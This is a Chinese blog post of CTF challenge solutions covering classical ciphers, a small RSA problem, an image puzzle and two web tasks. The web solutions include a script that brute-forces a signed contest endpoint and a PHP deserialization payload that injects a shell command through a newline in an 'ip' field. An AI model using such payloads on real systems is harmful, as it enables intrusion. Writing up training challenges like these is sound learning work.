20231210--不知道什么比赛的题

于 2023-12-13 01:11:54 发布
阅读量735 收藏
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rickliuxiao/article/details/134962207
版权

C1 - DONE

from secret import flag
from string import ascii_lowercase as alphabet

ctoi = lambda c: alphabet.index(c)
itoc = lambda i: alphabet[i]

a = 5
b = 13

cipher = ""
for c in flag:
    if c in alphabet:
        cipher += itoc((ctoi(c) * a + b) % 26)
    else:
        cipher += c

print(cipher)
# mqnr{414m904x-60m1-805m-73m2-71hn0nmnm467}

C2 - DONE

peoyjrbvku9ku}kosxoeq2okqy{vxk3pako6ky


--> rot13:
https://www.qqxiuzi.cn/bianma/zhalanmima.php

--> 栅栏(普通栅栏)6
# https://www.qqxiuzi.cn/bianma/zhalanmima.php
fueozhr
lak9ak}
aeineu
g2eago
{lna3f
qae6ao

flag{quae2laekieneo9naa6zaeg3ahkuofor}

C3 - simple_RSA - DONE

c=1547951720502687291395160194508023779246352093776850196990945603066628907353

n=41069065654959614597750207738698085798765257876378561837894254544512565197793

e=11

在这里插入图片描述

flag{414f904c-60f1-805f-73f2-71ea0afaf467}

M2-paintpaintpaint.jpg - DONE

flag{40fc0a979f759c8892f4dc045e28b820}

from PIL import Image

size = (300, 300)
img = Image.new('RGB', size)

lpxl = open('pixel.txt', 'r').read().split('\n')
for pxl in lpxl:
    t = pxl.split('(')[1].split(')')[0].split(',')
    x,y = int(t[0]), int(t[1])
    img.putpixel( (x,y), (255,0,0) )

img.show()

在这里插入图片描述

W1 - 老虎机 - DONE

打开这个题目 , 用burp抓包, 发现数据交互过程:
在这里插入图片描述

number=8028&sign=f8e918489f1e0a81ff11312f4d0630c1

number就是要爆破的内容。sign这个参数,是number的md5值。

所以,写个脚本,把0000-9999的所有数字,都爆破一下,对比返回包中有没有“Bad Luck"就可以了。

from hashlib import md5
from itertools import product
from string import digits
import requests

burp0_url = "http://39.108.128.46:32375/result.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0", "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate, br", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Referer": "http://39.108.128.46:32375/", "Connection": "close"}
bad = []
for i in product('5678901234', repeat=4):
    n = ''.join(i)
    m = md5(n.encode()).hexdigest()
    print(n, end=', ')
    burp0_data = {"number": n, "sign": m}
    try:
        ret = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=None)
        if "Bad Luck" not in ret.text:
            print(ret.text)
            break
        else:
            bad.append(ret.text)
    except:
        print(n)
        print('ddddddddddddddd')
        continue
    
with open('bad.txt', 'w') as f2:
    f2.write('\n'.join(bad)) # "flag" : "flag{3f484dca-2247-4ae2-b7df-ec43dc855d6e}"

W2 - pingwhere - DONE

在这里插入图片描述

反序列化+命令执行。

filesize触发tostring。

命令执行时,未过滤%0A。

构造exp:

<?php
class ping {
    var $ip;}
class info {
    var $file;}
$i = new info();
$p = new ping();
$p->ip = "127.0.0.1
ls > 1.txt";
$i->file = $p;
echo urlencode(serialize($i));

得到:

O%3A4%3A%22info%22%3A1%3A%7Bs%3A4%3A%22file%22%3BO%3A4%3A%22ping%22%3A1%3A%7Bs%3A2%3A%22ip%22%3Bs%3A21%3A%22127.0.0.1%0D%0Als+%3E+1.txt%22%3B%7D%7D

O:4:"info":1:{s:4:"file";O:4:"ping":1:{s:2:"ip";s:21:"127.0.0.1
ls+>+1.txt";}}
注意,windows下换行是\r\n,2个字符。而在linux下是\n,1个字符。
故上面的payload要换一下:
(1)21-->20
(2)删除%0D。
O%3A4%3A%22info%22%3A1%3A%7Bs%3A4%3A%22file%22%3BO%3A4%3A%22ping%22%3A1%3A%7Bs%3A2%3A%22ip%22%3Bs%3A20%3A%22127.0.0.1%0Als+%3E+1.txt%22%3B%7D%7D

提交后,即可以执行 【ls > 1.txt】 命令。

W3 - hole - TODO

jia9iniu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTF库>水果 {flag就隐藏在这些鲜艳的水果中,仔细找就能找到}
qq_42777804的博客
08-16 1498
key格式:CTF{xxx} 打开图片 又要用到我们的工具 StegSolve 打开 并且切换到 blue plan 0 发现是一张二维码 扫描获得信息 发现是一串数字(应该是十进制的数字) 45 46 45 46 32 45 32 46 46 45 46 32 46 45 46 46 32 46 46 46 32 45 46 46 46 32 46 46 45...
CSP-S 2020 第一轮比赛
10-11
CSP-S 2020 第一轮比赛 无水印 2020 CCF非专业级别软件能力认证第一轮 (CSP-S)提高级C++语言试
CTF基础-MISC篇
Sn1P3r的博客
09-13 3万+
编码是什么?   编码是信息从一种形式或格式转换为另一种形式的过程,也称为计算机 编程语言的代码简称编码。 用预先规定的方法将文字、数字或其它对象编成数码,或将信息、数据 转换成规定的电脉冲信号。   编码在电子计算机、电视、遥控和通讯等方面广泛使用。编码是信息从 一种形式或格式转换为另一种形式的过程。解码,是编码的逆过程。  Morse编码   摩尔斯电码(Morse code...
JavaScript 为小游戏项目添加图片(游戏)
weixin_33826609的博客
06-10 621
<script>function runSlots() {var slotOne;var slotTwo;var slotThree; var images = ["https://www.w3cschool.cn/statics/codecamp/images/9H17QFk.png", "https://www.w3cschool.cn/statics/codecamp/imag...
ctf中MISC之MP3等音频隐写
热门推荐
成长之路
08-25 4万+
0x00音频隐写二进制或者莫斯密码 音频中隐写摩斯电码 例:flag在音乐中123(例链接) 打开压缩包里面有一张图片和一个加密的压缩包(压缩包里面有被加密的music.wav音频文件) 图片上面有盲文(盲文介绍链接)对应明文是:kmdonowg 应该是压缩包密码 使用Audacity打开music.wav 粗的代表杠(-)   细的代表点(.),同时要注意格式:
CTF misc之音频隐写
weixin_44615599的博客
01-24 3927
**关于音频隐写** 下载完成后就是这样 重命名后, 我们发现里面有一个音频文件 ,于是用 打开分析 很明显 ,这是摩斯密码的形式 ,于是用-代表粗的竖线 ;用.代表细的竖线。 在线翻译后 成功得到 flag!!! 是不是很简单? ...
打字比赛活动--理工.docx
11-22
【打字比赛活动--理工】是一项旨在提升河南理工(建业青蓝校区)学生计算机技能的比赛,特别是增强他们的打字速度和准确性。这次比赛不仅是对学生计算机操作能力的检验,更是对他们学习成果的实际运用和日常生活技能的...
imaterialist-furniture-2018:Kaggle比赛
05-14
这是比赛第一名代码的一部分 竞赛:128个类别的图像分类链接: ://www.kaggle.com/c/imaterialist-challenge-furniture-2018结果:私人排行榜得分0.12565(要获得最终得分,我们平均需要更多模型) 怎么跑 将数据...
2021csp-j初赛试及答案.docx
11-09
CSP-J初赛试通常包括两部分:编程和算法。编程主要考察选手对基本编程语言(如C++或Python)的理解和运用,包括变量、数据类型、控制结构、函数等基础知识;算法则侧重于解决实际问的能力,涉及搜索、...
2017云计算样--1.docx
01-02
比赛要求参赛者在4小时内,按照指定任务书完成云计算平台的搭建,包括云网络、云存储和云主机的资源弹性配置,并利用该平台实现大数据的安全存储、授权访问、分析挖掘和快速检索。此外,还需开发Web应用和Android ...
智慧校园音视频系统整体解决方案-1PPT(24页).pptx
07-28
智慧校园整体解决方案是响应国家教育信息化政策,结合教育改革和技术创新的产物。该方案以物联网、大数据、人工智能和移动互联技术为基础,旨在打造一个安全、高效、互动且环保的教育环境。方案强调从数字化校园向智慧校园的转变,通过自动数据采集、智能分析和按需服务,实现校园业务的智能化管理。 方案的总体设计原则包括应用至上、分层设计和互联互通,确保系统能够满足不同用户角色的需求,并实现数据和资源的整合与共享。框架设计涵盖了校园安全、管理、教学、环境等多个方面,构建了一个全面的校园应用生态系统。这包括智慧安全系统、校园身份识别、智能排课及选课系统、智慧学习系统、精品录播教室方案等,以支持个性化学习和教学评估。 建设内容突出了智慧安全和智慧管理的重要性。智慧安全管理通过分布式录播系统和紧急预案一键启动功能,增强校园安全预警和事件响应能力。智慧管理系统则利用物联网技术,实现人员和设备的智能管理,提高校园运营效率。 智慧教学部分,方案提供了智慧学习系统和精品录播教室方案,支持专业级学习硬件和智能化网络管理,促进个性化学习和教学资源的高效利用。同时,教学质量评估中心和资源应用平台的建设,旨在提升教学评估的科学性和教育资源的共享性。 智慧环境建设则侧重于基于物联网的设备管理,通过智慧教室管理系统实现教室环境的智能控制和能效管理,打造绿色、节能的校园环境。电子班牌和校园信息发布系统的建设,将作为智慧校园的核心和入口,提供教务、一卡通、图书馆等系统的集成信息。 总体而言,智慧校园整体解决方案通过集成先进技术,不仅提升了校园的信息化水平,而且优化了教学和管理流程,为学生、教师和家长提供了更加便捷、个性化的教育体验。
基于Springboot和Vue的铁路订票管理系统源码 铁路订票管理系统代码(高分优秀毕业设计)
07-28
铁路订票管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
四足机器人 (2).pdf
07-28
四足机器人 (2)
IT运维流程-变更管理流程设计说明书.pdf
07-28
IT运维流程-变更管理流程设计说明书.pdf
基于java的竞赛管理系统-可执行内含文档代码-可执行内含文档代码.zip
07-28
基于java的竞赛管理系统-可执行内含文档代码-可执行内含文档代码.zip
数据库-db-demo.zip
07-28
使用python写一个db数据的操作代码
对Unet网络进行改进,python
最新发布
07-29
语言:python 任务:深度学习图像分割 网络:Unet网络进行改进 可实现自己的图像和标签进行训练和预测。
fft算法的应用研究-毕业设计pdf
07-28
一、设计目的 MATLAB是一种功能强大、效率高、交互性好的数值和可视化计算机高级语言,它将数值分析、矩阵运算、信号处理和图形显示有机地融合为一体,形成了一个极其方便、用户界面友好的操作环境。。经过多年的发展,已经发展成为一种功能全面的软件,几乎可以解决科学计算中所有问。MATLAB软件还提供了非常广泛和灵活的用于处理数据集的数组运算功能。 FFT算法的应用研究很广泛,数字信号也有很多,本次课程设计采取对语音信号进行FFT 算法的的应用研究:录制一段个人自己的语音信号,并对录制的信号进行采样;画出采样后语音信号的时域波形和频谱图;在Matlab环境下编写基2DIT-FFT算法;利用自己编写的算法对已采集的语音信号进行频谱分析,并画出语音信号的时域与频谱图,并与Matlab数字信号处理工具箱中的fft函数进行对比研究,验证自编算法的正确性
1080x1920尺寸的YUV/NV12的图像数据
07-28
1080x1920尺寸的YUV/NV12的图像数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jia9iniu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值